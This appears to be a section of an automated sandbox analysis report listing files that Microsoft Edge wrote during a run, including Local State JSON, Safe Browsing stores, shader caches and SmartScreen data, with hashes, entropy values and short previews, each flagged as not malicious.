                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.793409403210092
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfbpq3N1r5ih/cI9URLl8RotoIMFVvlwhLe4IbONIeTC6XQS0qGqk+Z4uj+t:akjsseiRUHhN6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:88C87BEC95261FDC5422AE7FC1AF4FE5
                                                                                                                                                                                                                                                                                  SHA1:8AB0A15481EA02040E7D3A0BA7490F226DC730A7
                                                                                                                                                                                                                                                                                  SHA-256:856AB8926E5507E7305561CEC9583B6413EEAF29733BF444F13B261A953AF4A0
                                                                                                                                                                                                                                                                                  SHA-512:21B9C3CB1C5A485149EC2BEFB7767C6FC7F7AE04D328F2BF29DDA2E356C89AB90075FCB1286A66A9A7A7A0DE8D076A67D40ED23E5BDCB1499CAC37B1AFF9FCDE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACeKwJxTYpySIzzlIF3S2+GEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADZpMxX5ZrzZSUSawzsHjKaLI45iFCxkZR4Rt9sNdZiFwAAAAA

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF42641.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.793409403210092
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfbpq3N1r5ih/cI9URLl8RotoIMFVvlwhLe4IbONIeTC6XQS0qGqk+Z4uj+t:akjsseiRUHhN6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:88C87BEC95261FDC5422AE7FC1AF4FE5
                                                                                                                                                                                                                                                                                  SHA1:8AB0A15481EA02040E7D3A0BA7490F226DC730A7
                                                                                                                                                                                                                                                                                  SHA-256:856AB8926E5507E7305561CEC9583B6413EEAF29733BF444F13B261A953AF4A0
                                                                                                                                                                                                                                                                                  SHA-512:21B9C3CB1C5A485149EC2BEFB7767C6FC7F7AE04D328F2BF29DDA2E356C89AB90075FCB1286A66A9A7A7A0DE8D076A67D40ED23E5BDCB1499CAC37B1AFF9FCDE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACeKwJxTYpySIzzlIF3S2+GEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADZpMxX5ZrzZSUSawzsHjKaLI45iFCxkZR4Rt9sNdZiFwAAAAA

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF45e58.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.793409403210092
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfbpq3N1r5ih/cI9URLl8RotoIMFVvlwhLe4IbONIeTC6XQS0qGqk+Z4uj+t:akjsseiRUHhN6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:88C87BEC95261FDC5422AE7FC1AF4FE5
                                                                                                                                                                                                                                                                                  SHA1:8AB0A15481EA02040E7D3A0BA7490F226DC730A7
                                                                                                                                                                                                                                                                                  SHA-256:856AB8926E5507E7305561CEC9583B6413EEAF29733BF444F13B261A953AF4A0
                                                                                                                                                                                                                                                                                  SHA-512:21B9C3CB1C5A485149EC2BEFB7767C6FC7F7AE04D328F2BF29DDA2E356C89AB90075FCB1286A66A9A7A7A0DE8D076A67D40ED23E5BDCB1499CAC37B1AFF9FCDE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACeKwJxTYpySIzzlIF3S2+GEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADZpMxX5ZrzZSUSawzsHjKaLI45iFCxkZR4Rt9sNdZiFwAAAAA

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.46731661083066856
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:TL1QAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3is25q0S9K0xHZ75fOV:TLiOUOq0afDdWec9sJf5Q7J5fc
                                                                                                                                                                                                                                                                                  MD5:E93ACF0820CA08E5A5D2D159729F70E3
                                                                                                                                                                                                                                                                                  SHA1:2C1A4D4924B9AEC1A796F108607404B000877C5D
                                                                                                                                                                                                                                                                                  SHA-256:F2267FDA7F45499F7A01186B75CEFB799F8D2BC97E2E9B5068952D477294302C
                                                                                                                                                                                                                                                                                  SHA-512:3BF36C20E04DCF1C16DC794E272F82F68B0DE43F16B4A9746B63B6D6BBC953B00BD7111CDA7AFE85CEBB2C447145483A382B15E2B0A5B36026C3441635D4E50C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\ChromeExtMalware.store (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2037233
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.001534564420981
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:49152:aJr4BfMZRD6FFWWn/O5b3gUS4AuwTVd5idKY467wSvQvhZ8payBjJTIgwsKaZaD0:W
                                                                                                                                                                                                                                                                                  MD5:173F96F8C5E0648BEBE25BB41F4B4CCF
                                                                                                                                                                                                                                                                                  SHA1:A69610ECBB42BD46645459A9E8A4CB9A7E33CE88
                                                                                                                                                                                                                                                                                  SHA-256:BAD624A91AA9F6CF580310662CE4B8E70529C9607E6B09B5CE02F2BBFBB526C4
                                                                                                                                                                                                                                                                                  SHA-512:C63AC79524084DC6818F173B05B7D78D21EFFF69B33F5E27121BBC2149902BCA021A9F1A1EBC6A9FCE39FF299604596EE07F728D482776E012B90AE8BAAA1A98
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........| .*..|.....|. ...|aaaaagfgdnjcdkncmfkfinnjaiapdblgaaaaaogokkamlflcoccdihncmbgcmflnaaaaaoipnhppjgickhnmdbgfbicakiamaaaaapdcjfaomkafnbpoclmfakjianjdaaaaapiecopgelmleoolpjapkgpglkcbaaaabcdhikdcpainmmjceakmkacogdkoaaaabdgnnajpalbdkkdnknbbbmndbilaaaaabfkbnfjnjldicllofdmjchdancccaaaabgphkbebbdbcibgbppdidkelfoigaaaabibhgjnbdelbcijfciclijhdkgohaaaabmldebjdieoplgdecloipkabiibcaaaaboojhahjgdjeknnemneiajjhhddiaaaabpccljmmhilhhndnjkobdedbpkjpaaaacmnkhlfjgehagffhnhdjfankefglaaaacnnimempmlomnnhdkimkfahjplfpaaaadbhonifkcheeddllhmpapnhcpgiaaaaadbkccgigjdmfmdhgikcckicldhjbaaaadbolalgmogecpogmlebfkpigmpdjaaaaehbfjkafkfgppkjageehakfakfbmaaaaehbppmedegafehiimempeifadcinaaaageoepbmnopkkfeadndbijdghellgaaaagfdmgcibcnlmgiipapnfocaocfneaaaagjojmcedjoignaljgmnihajfhhlpaaaaglldojfgdeaijnfefaggkfjekomeaaaaiihjniipljfegaknmbkneamnoajdaaaainjigbjlofcjekbnjnpiegecbnbaaaaaiognmpgbjoffachmpnnppfnokcbeaaaajcpbcbckoiafnblkdhnldokclbhiaaaajfoihhopfmnlhlnlhogjonmllocoaaaajhoimomebpcfopjpgkbbjdnldoihaaaakdafje

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\ChromeExtMalware.store_new

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2037233
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.001534564420981
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:49152:aJr4BfMZRD6FFWWn/O5b3gUS4AuwTVd5idKY467wSvQvhZ8payBjJTIgwsKaZaD0:W
                                                                                                                                                                                                                                                                                  MD5:173F96F8C5E0648BEBE25BB41F4B4CCF
                                                                                                                                                                                                                                                                                  SHA1:A69610ECBB42BD46645459A9E8A4CB9A7E33CE88
                                                                                                                                                                                                                                                                                  SHA-256:BAD624A91AA9F6CF580310662CE4B8E70529C9607E6B09B5CE02F2BBFBB526C4
                                                                                                                                                                                                                                                                                  SHA-512:C63AC79524084DC6818F173B05B7D78D21EFFF69B33F5E27121BBC2149902BCA021A9F1A1EBC6A9FCE39FF299604596EE07F728D482776E012B90AE8BAAA1A98
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........| .*..|.....|. ...|aaaaagfgdnjcdkncmfkfinnjaiapdblgaaaaaogokkamlflcoccdihncmbgcmflnaaaaaoipnhppjgickhnmdbgfbicakiamaaaaapdcjfaomkafnbpoclmfakjianjdaaaaapiecopgelmleoolpjapkgpglkcbaaaabcdhikdcpainmmjceakmkacogdkoaaaabdgnnajpalbdkkdnknbbbmndbilaaaaabfkbnfjnjldicllofdmjchdancccaaaabgphkbebbdbcibgbppdidkelfoigaaaabibhgjnbdelbcijfciclijhdkgohaaaabmldebjdieoplgdecloipkabiibcaaaaboojhahjgdjeknnemneiajjhhddiaaaabpccljmmhilhhndnjkobdedbpkjpaaaacmnkhlfjgehagffhnhdjfankefglaaaacnnimempmlomnnhdkimkfahjplfpaaaadbhonifkcheeddllhmpapnhcpgiaaaaadbkccgigjdmfmdhgikcckicldhjbaaaadbolalgmogecpogmlebfkpigmpdjaaaaehbfjkafkfgppkjageehakfakfbmaaaaehbppmedegafehiimempeifadcinaaaageoepbmnopkkfeadndbijdghellgaaaagfdmgcibcnlmgiipapnfocaocfneaaaagjojmcedjoignaljgmnihajfhhlpaaaaglldojfgdeaijnfefaggkfjekomeaaaaiihjniipljfegaknmbkneamnoajdaaaainjigbjlofcjekbnjnpiegecbnbaaaaaiognmpgbjoffachmpnnppfnokcbeaaaajcpbcbckoiafnblkdhnldokclbhiaaaajfoihhopfmnlhlnlhogjonmllocoaaaajhoimomebpcfopjpgkbbjdnldoihaaaakdafje

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_0

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_2

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_3

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\index

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                                                                                                                                  Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:LsNlvirlll:Ls30lll
                                                                                                                                                                                                                                                                                  MD5:3323C90A9FCA9885A8404B6791A3C01A
                                                                                                                                                                                                                                                                                  SHA1:93AE8469553F2E46F6DE64A75FBEBA2EF191C8E6
                                                                                                                                                                                                                                                                                  SHA-256:7A2FD383500679578AC7B707F5291057978D220546BD0A6E47ACB545313CBB3F
                                                                                                                                                                                                                                                                                  SHA-512:73AC7C1A92C84BE6C35DB2419818D61A4A5BD0F98CE0AEF9B522FDF571DC287F04D8534C500066D40D007F6F2B3CD1C347801430A93A2DF1AB78C0DA29785FC3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................=7)F../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):47
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                  MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                  SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                  SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                  SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):35
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                  MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                  SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                  SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                  SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSynchronousLookupUris

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.922828737239167
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:2NGw+K+:fwZ+
                                                                                                                                                                                                                                                                                  MD5:7BAAFE811F480ACFCCCEE0D744355C79
                                                                                                                                                                                                                                                                                  SHA1:24B89AE82313084BB8BBEB9AD98A550F41DF7B27
                                                                                                                                                                                                                                                                                  SHA-256:D5743766AF0312C7B7728219FC24A03A4FB1C2A54A506F337953FBC2C1B847C7
                                                                                                                                                                                                                                                                                  SHA-512:70FE1C197AF507CC0D65E99807D245C896A40A4271BA1121F9B621980877B43019E584C48780951FC1AD2A5D7D146FC6EA4678139A5B38F9B6F7A5F1E2E86BA3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:customSynchronousLookupUris_0

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSynchronousLookupUris_0

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):35302
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.99333285466604
                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                  SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                                                                                                                                                  MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                                                                                                                                                  SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                                                                                                                                                  SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                                                                                                                                                  SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):81
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                  MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                  SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
